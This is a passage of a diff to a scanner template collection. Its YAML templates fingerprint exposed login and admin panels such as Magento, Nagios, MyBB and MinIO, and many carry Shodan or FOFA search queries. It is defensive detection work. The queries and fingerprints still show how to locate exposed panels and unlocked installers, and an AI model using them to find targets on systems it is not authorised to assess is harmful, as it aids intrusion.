+        part: body
+        words:
+          - "<title>Kavita"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/keenetic-web-login.yaml b/exposed-panels/keenetic-web-login.yaml
index d2ebd699e0..31b0e26465 100644
--- a/exposed-panels/keenetic-web-login.yaml
+++ b/exposed-panels/keenetic-web-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6817
-  tags: panel,keenetic
+  tags: panel,keenetic,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/kenesto-login.yaml b/exposed-panels/kenesto-login.yaml
index 853eaf64ee..8151f43c6f 100644
--- a/exposed-panels/kenesto-login.yaml
+++ b/exposed-panels/kenesto-login.yaml
@@ -1,26 +1,26 @@
-id: kenesto-login
+id: kenesto-login
 
-info:
-  name: Kenesto Login Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="kenesto"'
-  tags: login,tech,kenesto
+info:
+  name: Kenesto Login Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="kenesto"'
+  tags: login,tech,kenesto
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>Welcome To Kenesto&reg;</title>'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Welcome To Kenesto&reg;</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/kettle-panel.yaml b/exposed-panels/kettle-panel.yaml
new file mode 100644
index 0000000000..df56a1682d
--- /dev/null
+++ b/exposed-panels/kettle-panel.yaml
@@ -0,0 +1,21 @@
+id: kettle-panel
+
+info:
+  name: Kettle Panel
+  author: For3stCo1d
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: basic realm="Kettle"
+  tags: panel,kettle
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'basic realm="Kettle"'
diff --git a/exposed-panels/kkfileview-panel.yaml b/exposed-panels/kkfileview-panel.yaml
new file mode 100644
index 0000000000..b7a5ccac81
--- /dev/null
+++ b/exposed-panels/kkfileview-panel.yaml
@@ -0,0 +1,25 @@
+id: kkfileview-panel
+
+info:
+  name: kkFileView Panel Detect
+  author: arafatansari
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"kkFileView"
+  tags: panel,kkfileview
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>kkFileView演示首页</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/kubernetes-mirantis.yaml b/exposed-panels/kubernetes-mirantis.yaml
index 1a0795831e..61203af3bf 100644
--- a/exposed-panels/kubernetes-mirantis.yaml
+++ b/exposed-panels/kubernetes-mirantis.yaml
@@ -1,12 +1,14 @@
 id: kubernetes-mirantis
 
 info:
-  name: Detect Mirantis Kubernetes Engine
+  name: Mirantis Kubernetes Engine
   author: pussycat0x
   severity: info
   metadata:
+    verified: true
+    shodan-query: http.html:"Mirantis Kubernetes Engine"
     fofa-query: app="Mirantis-Kubernetes-Engine"
-  tags: tech,kubernetes
+  tags: tech,kubernetes,devops,kube,k8s
 
 requests:
   - method: GET
@@ -22,4 +24,4 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
diff --git a/exposed-panels/lacie-panel.yaml b/exposed-panels/lacie-panel.yaml
index bade63e22f..24e65f2388 100644
--- a/exposed-panels/lacie-panel.yaml
+++ b/exposed-panels/lacie-panel.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7118
-  tags: panel,lacie,login
+  tags: panel,lacie,login,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/lansweeper-login.yaml b/exposed-panels/lansweeper-login.yaml
index 0b2f4fc89c..727a06efff 100644
--- a/exposed-panels/lansweeper-login.yaml
+++ b/exposed-panels/lansweeper-login.yaml
@@ -1,26 +1,26 @@
-id: lansweeper-login
+id: lansweeper-login
 
-info:
-  name: Lansweeper Login
-  author: divya_mudgal
-  severity: info
-  tags: lansweeper,tech,panel
+info:
+  name: Lansweeper Login
+  author: divya_mudgal
+  severity: info
+  tags: lansweeper,tech,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login.aspx"
-      - "{{BaseURL}}/favicon.ico"
-
-    stop-at-first-match: true
-    matchers-condition: or
-    matchers:
-      - type: word
-        name: login
-        words:
-          - "Lansweeper - Login"
-
-      - type: dsl
-        name: favicon
-        dsl:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.aspx"
+      - "{{BaseURL}}/favicon.ico"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        name: login
+        words:
+          - "Lansweeper - Login"
+
+      - type: dsl
+        name: favicon
+        dsl:
           - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))"
\ No newline at end of file
diff --git a/exposed-panels/led-imediacloud-panel.yaml b/exposed-panels/led-imediacloud-panel.yaml
new file mode 100644
index 0000000000..1ee6373e9e
--- /dev/null
+++ b/exposed-panels/led-imediacloud-panel.yaml
@@ -0,0 +1,26 @@
+id: led-imediacloud-panel
+
+info:
+  name: LEDiMediaCloud Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"LEDiMediaCloud"
+  tags: panel,led,mediacloud
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'LEDiMediaCloud'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/linksys-wifi-login.yaml b/exposed-panels/linksys-wifi-login.yaml
index 082990be6f..976b80985f 100644
--- a/exposed-panels/linksys-wifi-login.yaml
+++ b/exposed-panels/linksys-wifi-login.yaml
@@ -1,28 +1,28 @@
-id: linksys-wifi-login
+id: linksys-wifi-login
 
-info:
-  name: Linksys Smart Wi-Fi
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: http.title:"Linksys Smart WI-FI"
-  tags: tech,panel,linksys,iot
+info:
+  name: Linksys Smart Wi-Fi
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: http.title:"Linksys Smart WI-FI"
+  tags: tech,panel,linksys,iot
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    redirects: true
-    max-redirects: 2
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<title>Linksys Smart Wi-Fi</title>"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Linksys Smart Wi-Fi</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/livehelperchat-admin-panel.yaml b/exposed-panels/livehelperchat-admin-panel.yaml
new file mode 100644
index 0000000000..2bba46024e
--- /dev/null
+++ b/exposed-panels/livehelperchat-admin-panel.yaml
@@ -0,0 +1,29 @@
+id: livehelperchat-admin-panel
+
+info:
+  name: Live Helper Chat Admin Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Live Helper Chat"
+    fofa-query: title="Live Helper Chat"
+  tags: livehelperchat,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/site_admin/user/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Live Helper Chat"
+          - "Please login"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/looker-panel.yaml b/exposed-panels/looker-panel.yaml
new file mode 100644
index 0000000000..14d0690bf9
--- /dev/null
+++ b/exposed-panels/looker-panel.yaml
@@ -0,0 +1,28 @@
+id: looker-panel
+
+info:
+  name: Looker Login Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan: http.html:"lookerVersion"
+  tags: panel,login,looker
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "lookerVersion"
+          - "lookerLocation.title"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/lucee-login.yaml b/exposed-panels/lucee-login.yaml
index 5a28c0d63d..0f2c5cc1a1 100644
--- a/exposed-panels/lucee-login.yaml
+++ b/exposed-panels/lucee-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Lucee Web/Server Administrator Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Lucee%22
+  metadata:
+    shodan-query: http.title:"Lucee"
   tags: panel,lucee
 
 requests:
diff --git a/exposed-panels/magento-admin-panel.yaml b/exposed-panels/magento-admin-panel.yaml
index e003504564..4dbb067919 100644
--- a/exposed-panels/magento-admin-panel.yaml
+++ b/exposed-panels/magento-admin-panel.yaml
@@ -2,12 +2,16 @@ id: magento-admin-panel
 
 info:
   name: Exposed Magento Admin Panel
-  author: TechbrunchFR
+  author: TechbrunchFR,ritikchaddha
   severity: info
-  description: As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site
+  description: |
+    As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site
     from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access.
   reference:
     - https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html
+  metadata:
+    verified: true
+    shodan-query: http.component:"Magento"
   tags: magento,panel
 
 requests:
@@ -15,13 +19,14 @@ requests:
     path:
       - '{{BaseURL}}/admin'
 
+    redirects: true
+    max-redirects: 2
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 302
 
       - type: word
+        part: body
         words:
-          - "/admin/index/index/key/"
-        part: header
\ No newline at end of file
+          - "Magento"
+          - "Admin Panel"
+        condition: and
diff --git a/exposed-panels/magento-downloader-panel.yaml b/exposed-panels/magento-downloader-panel.yaml
new file mode 100644
index 0000000000..bf052c464c
--- /dev/null
+++ b/exposed-panels/magento-downloader-panel.yaml
@@ -0,0 +1,46 @@
+id: magento-downloader-panel
+
+info:
+  name: Magento Downloader Exposed
+  author: 5up3r541y4n
+  severity: info
+  description: |
+      Magento Connect Manager available via /downloader/ location is used for installation of Magento extensions and Magento upgrades and requires Magento admin rights for the action. It uses the same authorization methods as for Backend. Therefore if bot will find out a matching pair of login/password, whole Magento installation will be compromised. Attacker will be able to discover backend URL for login (even if it is customized as described in Securing Magento /admin/), install a Filesystem extension to obtain full access to all files and finally database.
+  reference:
+    - https://magentary.com/kb/restrict-access-to-magento-downloader/
+    - https://www.mageplaza.com/kb/how-to-stop-brute-force-attacks-magento.html#solution-3
+  metadata:
+    verified: true
+    shodan-query: http.component:"Magento"
+  tags: magento,exposure
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/downloader/'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "Magento Downloader"
+          - "Log In"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '\(Magento Connect Manager ver\. ([0-9.]+)'
diff --git a/exposed-panels/mailwatch-login.yaml b/exposed-panels/mailwatch-login.yaml
new file mode 100644
index 0000000000..6df0e350f4
--- /dev/null
+++ b/exposed-panels/mailwatch-login.yaml
@@ -0,0 +1,28 @@
+id: mailwatch-login
+
+info:
+  name: MailWatch Login Page
+  author: oppsec
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"MailWatch Login Page"
+  tags: panel,mailwatch
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mailscanner/login.php"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "MailWatch Login"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/mfiles-web-detect.yaml b/exposed-panels/mfiles-web-detect.yaml
new file mode 100644
index 0000000000..99d777aae2
--- /dev/null
+++ b/exposed-panels/mfiles-web-detect.yaml
@@ -0,0 +1,33 @@
+id: mfiles-web-detect
+
+info:
+  name: M-Files Web Panel Detect
+  author: Nodauf
+  severity: info
+  reference:
+    - https://www.m-files.com/about/trust-center/security-advisories/
+  metadata:
+    verified: true
+    shodan-query: http.html:"M-Files Web"
+  tags: panel,m-files
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/Login.aspx"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<title>(.*)M-Files Web(.*)</title>'
+
+      - type: word
+        part: body
+        words:
+          - 'M-Files user'
+          - 'M-Files authentication'
+        condition: or
diff --git a/exposed-panels/microfocus-filr-panel.yaml b/exposed-panels/microfocus-filr-panel.yaml
new file mode 100644
index 0000000000..781d44db0e
--- /dev/null
+++ b/exposed-panels/microfocus-filr-panel.yaml
@@ -0,0 +1,26 @@
+id: microfocus-filr-panel
+
+info:
+  name: Micro Focus Filr Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Micro Focus Filr"
+  tags: panel,microfocus,filr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/filr/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Micro Focus Filr"
+
+      - type: status
+        status:
+          - 404
diff --git a/exposed-panels/microfocus-vibe-panel.yaml b/exposed-panels/microfocus-vibe-panel.yaml
new file mode 100644
index 0000000000..3302feee79
--- /dev/null
+++ b/exposed-panels/microfocus-vibe-panel.yaml
@@ -0,0 +1,30 @@
+id: microfocus-vibe-panel
+
+info:
+  name: Micro Focus Vibe Login Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Micro Focus Vibe"
+  tags: panel,microfocus,vibe
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ssf/s/portalLogin"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Micro Focus Vibe"
+          - "baseVibeUrl"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/mini-start-page.yaml b/exposed-panels/mini-start-page.yaml
index d2103bd9ce..015fa09fd5 100644
--- a/exposed-panels/mini-start-page.yaml
+++ b/exposed-panels/mini-start-page.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6500
-  tags: panel
+  tags: edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/minio-console.yaml b/exposed-panels/minio-console.yaml
index 0b0e946393..b144543b9e 100644
--- a/exposed-panels/minio-console.yaml
+++ b/exposed-panels/minio-console.yaml
@@ -1,26 +1,26 @@
-id: minio-console
+id: minio-console
 
-info:
-  name: MinIO Console
-  author: pussycat0x
-  severity: info
-  tags: panel,minio
-  metadata:
-    fofa-query: app="MinIO-Console"
-    shodan-query: title:"MinIO Console"
+info:
+  name: MinIO Console
+  author: pussycat0x
+  severity: info
+  tags: panel,minio
+  metadata:
+    fofa-query: app="MinIO-Console"
+    shodan-query: title:"MinIO Console"
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login"
-
-    matchers-condition: and
-    matchers:
-
-      - type: dsl
-        dsl:
-          - "contains(tolower(body), '<title>minio console</title>')"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+
+      - type: dsl
+        dsl:
+          - "contains(tolower(body), '<title>minio console</title>')"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/exposed-panels/mitel-panel-detect.yaml b/exposed-panels/mitel-panel-detect.yaml
new file mode 100644
index 0000000000..8b8a40c1ab
--- /dev/null
+++ b/exposed-panels/mitel-panel-detect.yaml
@@ -0,0 +1,30 @@
+id: mitel-panel-detect
+
+info:
+  name: Mitel Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Mitel Networks"
+  tags: panel,mitel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/server-common/cgi-bin/login"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Mitel Networks Corporation"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/mobile-management-panel.yaml b/exposed-panels/mobile-management-panel.yaml
new file mode 100644
index 0000000000..c9f8e66cd6
--- /dev/null
+++ b/exposed-panels/mobile-management-panel.yaml
@@ -0,0 +1,35 @@
+id: mobile-management-panel
+
+info:
+  name: Mobile Management Platform Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    fofa-query: title="移动管理平台-企业管理"
+  tags: panel,mobile,management
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "移动管理平台-企业管理"
+          - "Mobile management platform"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'version = "(.*)"'
diff --git a/exposed-panels/mongodb-ops-manager.yaml b/exposed-panels/mongodb-ops-manager.yaml
index 9860a09a8d..6842c0e9a4 100644
--- a/exposed-panels/mongodb-ops-manager.yaml
+++ b/exposed-panels/mongodb-ops-manager.yaml
@@ -4,8 +4,8 @@ info:
   name: MongoDB Ops Manager
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22
+  metadata:
+    shodan-query: http.title:"MongoDB Ops Manager"
   tags: panel,mongodb
 
 requests:
diff --git a/exposed-panels/ms-adcs-detect.yaml b/exposed-panels/ms-adcs-detect.yaml
index 194500433a..3bac89233d 100644
--- a/exposed-panels/ms-adcs-detect.yaml
+++ b/exposed-panels/ms-adcs-detect.yaml
@@ -1,29 +1,29 @@
-id: ms-adcs-detect
+id: ms-adcs-detect
 
-info:
-  name: MS Active Directory Certificate Services Detector
-  author: divya_mudgal
-  severity: info
-  tags: microsoft,ad,panel
+info:
+  name: MS Active Directory Certificate Services Detector
+  author: divya_mudgal
+  severity: info
+  tags: microsoft,ad,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 302
-          - 301
-        condition: or
-
-      - type: dsl
-        dsl:
-          - "contains(tolower(all_headers), '/certsrv')"
-
-    extractors:
-      - type: kval
-        kval:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+          - 301
+        condition: or
+
+      - type: dsl
+        dsl:
+          - "contains(tolower(all_headers), '/certsrv')"
+
+    extractors:
+      - type: kval
+        kval:
           - location
\ No newline at end of file
diff --git a/exposed-panels/mybb-forum-detect.yaml b/exposed-panels/mybb-forum-detect.yaml
new file mode 100644
index 0000000000..536e1b590b
--- /dev/null
+++ b/exposed-panels/mybb-forum-detect.yaml
@@ -0,0 +1,25 @@
+id: mybb-forum-detect
+
+info:
+  name: MyBB Forum Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"MyBB"
+  tags: panel,mybb,forum
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/portal.php'
+
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'MyBB Forum'
+          - '<title>MyBB'
+        condition: or
diff --git a/exposed-panels/mybb/mybb-forum-install.yaml b/exposed-panels/mybb/mybb-forum-install.yaml
new file mode 100644
index 0000000000..e463e9e50f
--- /dev/null
+++ b/exposed-panels/mybb/mybb-forum-install.yaml
@@ -0,0 +1,34 @@
+id: mybb-forum-install
+
+info:
+  name: MyBB Exposed Installation
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.title:"MyBB"
+  tags: panel,mybb,forum
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/install/index.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'MyBB'
+          - 'Installation Wizard'
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - 'currently locked'
+        negative: true
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/nagios-panel.yaml b/exposed-panels/nagios-panel.yaml
new file mode 100644
index 0000000000..38861bee29
--- /dev/null
+++ b/exposed-panels/nagios-panel.yaml
@@ -0,0 +1,28 @@
+id: nagios-panel
+
+info:
+  name: Nagios Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"nagios"
+  tags: panel,nagios
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/nagios"
+      - "{{BaseURL}}/nagios3"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Nagios Access'
+
+      - type: status
+        status:
+          - 401
diff --git a/exposed-panels/nagios-xi-panel.yaml b/exposed-panels/nagios-xi-panel.yaml
new file mode 100644
index 0000000000..3efcbd9587
--- /dev/null
+++ b/exposed-panels/nagios-xi-panel.yaml
@@ -0,0 +1,32 @@
+id: nagios-xi-panel
+
+info:
+  name: Nagios XI Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"Nagios XI"
+  tags: panel,nagios,nagios-xi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/nagiosxi/login.php"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'alt="Nagios XI'
+          - '/nagiosxi/includes'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/nagvis-panel.yaml b/exposed-panels/nagvis-panel.yaml
new file mode 100644
index 0000000000..ad683a4c33
--- /dev/null
+++ b/exposed-panels/nagvis-panel.yaml
@@ -0,0 +1,32 @@
+id: nagvis-panel
+
+info:
+  name: Nagvis Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"NagVis"
+  tags: panel,nagvis
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/nagvis/frontend/nagvis-js/index.php"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/nagvis/userfiles"
+          - "<title>NagVis"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/nconf-panel.yaml b/exposed-panels/nconf-panel.yaml
new file mode 100644
index 0000000000..62c8527908
--- /dev/null
+++ b/exposed-panels/nconf-panel.yaml
@@ -0,0 +1,28 @@
+id: nconf-panel
+
+info:
+  name: NConf Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"nconf"
+  tags: panel,nconf
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "nconf.js"
+          - "<title>NConf"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/netdata-dashboard-detected.yaml b/exposed-panels/netdata-dashboard-detected.yaml
index bb58d9d4b8..9ca6d2ee3f 100644
--- a/exposed-panels/netdata-dashboard-detected.yaml
+++ b/exposed-panels/netdata-dashboard-detected.yaml
@@ -1,25 +1,25 @@
-id: netdata-dashboard-detect
+id: netdata-dashboard-detect
 
-info:
-  name: NetData Dashboard Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: 'Server: NetData Embedded HTTP Server'
-  tags: netdata,panel,tech
+info:
+  name: NetData Dashboard Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'Server: NetData Embedded HTTP Server'
+  tags: netdata,panel,tech
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>netdata dashboard</title>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>netdata dashboard</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/netdata-panel.yaml b/exposed-panels/netdata-panel.yaml
new file mode 100644
index 0000000000..2c09d19bd8
--- /dev/null
+++ b/exposed-panels/netdata-panel.yaml
@@ -0,0 +1,34 @@
+id: netdata-panel
+
+info:
+  name: Netdata Panel
+  author: TechbrunchFR
+  severity: low
+  description: |
+    Netdata is high-fidelity infrastructure monitoring and troubleshooting. Open-source, free, preconfigured, opinionated, and always real-time.
+  metadata:
+    shodan-query: http.title:"netdata dashboard"
+  reference:
+    - https://github.com/netdata/netdata
+  tags: panel,netdata
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/info"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: word
+        part: body
+        words:
+          - "netdata"
\ No newline at end of file
diff --git a/exposed-panels/netscaler-aaa-login.yaml b/exposed-panels/netscaler-aaa-login.yaml
index 45c2d35fa0..00eed1e8c4 100644
--- a/exposed-panels/netscaler-aaa-login.yaml
+++ b/exposed-panels/netscaler-aaa-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6898
-  tags: panel,netscaler,login
+  tags: panel,netscaler,login,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/nginx-proxy-manager.yaml b/exposed-panels/nginx-proxy-manager.yaml
index ca55d51947..f223e8fd50 100644
--- a/exposed-panels/nginx-proxy-manager.yaml
+++ b/exposed-panels/nginx-proxy-manager.yaml
@@ -4,8 +4,8 @@ info:
   name: Nginx Proxy Manager
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Nginx+Proxy+Manager%22
+  metadata:
+    shodan-query: http.title:"Nginx Proxy Manager"
   tags: panel,nginx,proxy
 
 requests:
diff --git a/exposed-panels/noescape-login.yaml b/exposed-panels/noescape-login.yaml
new file mode 100644
index 0000000000..256aaa5e7e
--- /dev/null
+++ b/exposed-panels/noescape-login.yaml
@@ -0,0 +1,22 @@
+id: noescape-login
+
+info:
+  name: NoEscape Login Panel
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"NoEscape - Login"
+  tags: panel,noescape
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'NoEscape - Login'
diff --git a/exposed-panels/nzbget-panel.yaml b/exposed-panels/nzbget-panel.yaml
new file mode 100644
index 0000000000..d9cc78a6e4
--- /dev/null
+++ b/exposed-panels/nzbget-panel.yaml
@@ -0,0 +1,30 @@
+id: nzbget-panel
+
+info:
+  name: NZBGet Login Panel
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"NZBGet"
+  tags: panel,nzbget
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>NZBGet</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/ocomon-panel.yaml b/exposed-panels/ocomon-panel.yaml
new file mode 100644
index 0000000000..b82d7fd0ff
--- /dev/null
+++ b/exposed-panels/ocomon-panel.yaml
@@ -0,0 +1,39 @@
+id: ocomon-panel
+
+info:
+  name: OcoMon Login Panel
+  author: dogasantos
+  severity: info
+  description: a tiny helpdesk system written in php
+  reference:
+    - https://sourceforge.net/projects/ocomonphp/
+  metadata:
+    verified: true
+    shodan-query: http.html:"OcoMon"
+  tags: panel,ocomon,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - '(?i)(OcoMon)'
+
+      - type: word
+        part: body
+        words:
+          - 'open_form/ticket_form_open.php'
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - 'Versão: ([0-9.]+)'
+          - 'Versão:&nbsp;([0-9.]+)'
diff --git a/exposed-panels/ocs-inventory-login.yaml b/exposed-panels/ocs-inventory-login.yaml
index 4bbd1e8f3c..de2cafbe04 100644
--- a/exposed-panels/ocs-inventory-login.yaml
+++ b/exposed-panels/ocs-inventory-login.yaml
@@ -2,9 +2,11 @@ id: ocs-inventory-login
 
 info:
